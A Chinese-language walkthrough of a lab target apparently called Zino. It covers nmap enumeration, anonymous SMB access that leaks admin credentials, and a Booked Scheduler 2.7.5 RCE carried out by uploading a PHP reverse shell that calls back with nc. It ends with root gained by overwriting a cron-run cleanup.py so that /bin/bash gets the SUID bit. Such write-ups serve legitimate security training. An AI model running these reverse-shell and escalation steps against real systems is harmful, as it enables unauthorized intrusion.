主要知识点
- SMB知识
- python脚本提权
具体步骤
执行nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-10 01:24 UTC
Nmap scan report for 192.168.52.64
Host is up (0.00077s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b2:66:75:50:1b:18:f5:e9:9f:db:2c:d4:e3:95:7a:44 (RSA)
| 256 91:2d:26:f1:ba:af:d1:8b:69:8f:81:4a:32:af:9c:77 (ECDSA)
|_ 256 ec:6f:df:8b:ce:19:13:8a:52:57:3e:72:a3:14:6f:40 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| JavaRMI, NULL, RTSPRequest:
|_ Host '192.168.49.52' is not allowed to connect to this MariaDB server
8003/tcp open http Apache httpd 2.4.38
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-02-05 21:02 booked/
|_
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
访问 http://192.168.231.64:8003/booked/,得到一个Booked Scheduler v2.7.5
经过调查,该版本具有RCE漏洞,采用下面这个exp,但是我们没有密码,需要继续调查GitHub - F-Masood/Booked-Scheduler-2.7.5---RCE-Without-MSF: Exploiting Booked Scheduler 2.7.5 - RCE without MSF.
尝试smbclient,发现支持匿名登录
C:\home\kali\Documents\OFFSEC\GoToWork\Zino> smbclient -L 192.168.231.64
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
zino Disk Logs
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
所以继续尝试,下载zino路径下的文件
C:\home\kali\Documents\OFFSEC\GoToWork\Zino> smbclient //192.168.231.64/zino -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jul 9 15:11:49 2020
.. D 0 Tue Apr 28 09:38:53 2020
.bash_history H 0 Tue Apr 28 11:35:28 2020
error.log N 265 Tue Apr 28 10:07:32 2020
.bash_logout H 220 Tue Apr 28 09:38:53 2020
local.txt N 33 Wed Oct 9 22:51:18 2024
.bashrc H 3526 Tue Apr 28 09:38:53 2020
.gnupg DH 0 Tue Apr 28 10:17:02 2020
.profile H 807 Tue Apr 28 09:38:53 2020
misc.log N 424 Tue Apr 28 10:08:15 2020
auth.log N 368 Tue Apr 28 10:07:54 2020
access.log N 5464 Tue Apr 28 10:07:09 2020
ftp D 0 Tue Apr 28 10:12:56 2020
其中msic.log文件中发现admin/adminadmin credential,
C:\home\kali\Documents\OFFSEC\GoToWork\Zino> cat misc.log
Apr 28 08:39:01 zino systemd[1]: Starting Clean php session files...
Apr 28 08:39:01 zino CRON[2791]: (CRON) info (No MTA installed, discarding output)
Apr 28 08:39:01 zino systemd[1]: phpsessionclean.service: Succeeded.
Apr 28 08:39:01 zino systemd[1]: Started Clean php session files.
Apr 28 08:39:01 zino systemd[1]: Set application username "admin"
Apr 28 08:39:01 zino systemd[1]: Set application password "adminadmin"
用来尝试登录bookscheduler,成功,按照exp的描述,首先创建一个php reverse shell
C:\home\kali\Documents\OFFSEC\GoToWork\Zino> cat rev.php
<?php echo (shell_exec("rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.170 8003 >/tmp/f")); ?>
并上传
在本地启动nc -nlvp 8003后访问 http://192.168.231.64:8003/booked/Web/custom-favicon.php得到reverse shell
C:\home\kali\Documents\OFFSEC\GoToWork\Zino> nc -nlvp 8003
listening on [any] 8003 ...
connect to [192.168.45.170] from (UNKNOWN) [192.168.231.64] 43952
bash: cannot set terminal process group (543): Inappropriate ioctl for device
bash: no job control in this shell
www-data@zino:/var/www/html/booked/Web$ ls -l
ls -l
total 236
在本地启动python server,上传linpeas.sh后并执行
C:\home\kali\Documents\OFFSEC\GoToWork\Zino> python -m http.server 3306
Serving HTTP on 0.0.0.0 port 3306 (http://0.0.0.0:3306/) ...
发现cron job定期以root身份执行 cleanup.py
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/3 * * * * root python /var/www/html/booked/cleanup.py
并且www-data用户具有写权限
www-data@zino:/var/www/html/booked/Web$ cd /var/www/html/booked/
cd /var/www/html/booked/
www-data@zino:/var/www/html/booked$ ls -lrt
ls -lrt
total 420
-rw-rw-rw- 1 www-data www-data 260290 Feb 5 2019 cacert.pem
......
......
drwxrwxrwx 21 www-data www-data 4096 Feb 5 2019 tpl
drwxrwxrwx 8 www-data www-data 4096 Feb 5 2019 plugins
-rwxrwxrwx 1 www-data www-data 164 Apr 28 2020 cleanup.py
......
......
在本地创建cleanup.py,包含如下内容
#!/usr/bin/env python
import os
import sys
try:
os.system('chmod +s /bin/bash ')
except:
print 'ERROR...'
sys.exit(0)
并上传至 remote server上的/var/www/html/booked/路径下 覆盖同名文件后获得root权限
www-data@zino:/var/www/html/booked$ wget 192.168.45.170:3306/cleanup.py -O cleanup.py
<$ wget 192.168.45.170:3306/cleanup.py -O cleanup.py
--2024-10-10 00:38:29-- http://192.168.45.170:3306/cleanup.py
Connecting to 192.168.45.170:3306... connected.
HTTP request sent, awaiting response... 200 OK
Length: 135 [text/x-python]
Saving to: 'cleanup.py'
0K 100% 33.7M=0s
2024-10-10 00:38:30 (33.7 MB/s) - 'cleanup.py' saved [135/135]
www-data@zino:/var/www/html/booked$ chmod +x cleanup.py
chmod +x cleanup.py
www-data@zino:/var/www/html/booked$ ls -l /bin/bash
ls -l /bin/bash
-rwxr-xr-x 1 root root 1168776 Apr 18 2019 /bin/bash
www-data@zino:/var/www/html/booked$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
www-data@zino:/var/www/html/booked$ /bin/bash -p
/bin/bash -p
cat /root/proof.txt
837cb6c08291148e42c89ef029e3119a
cat /home/peter/local.txt
4a8e18206f2f4d55df963b6c2b83138c
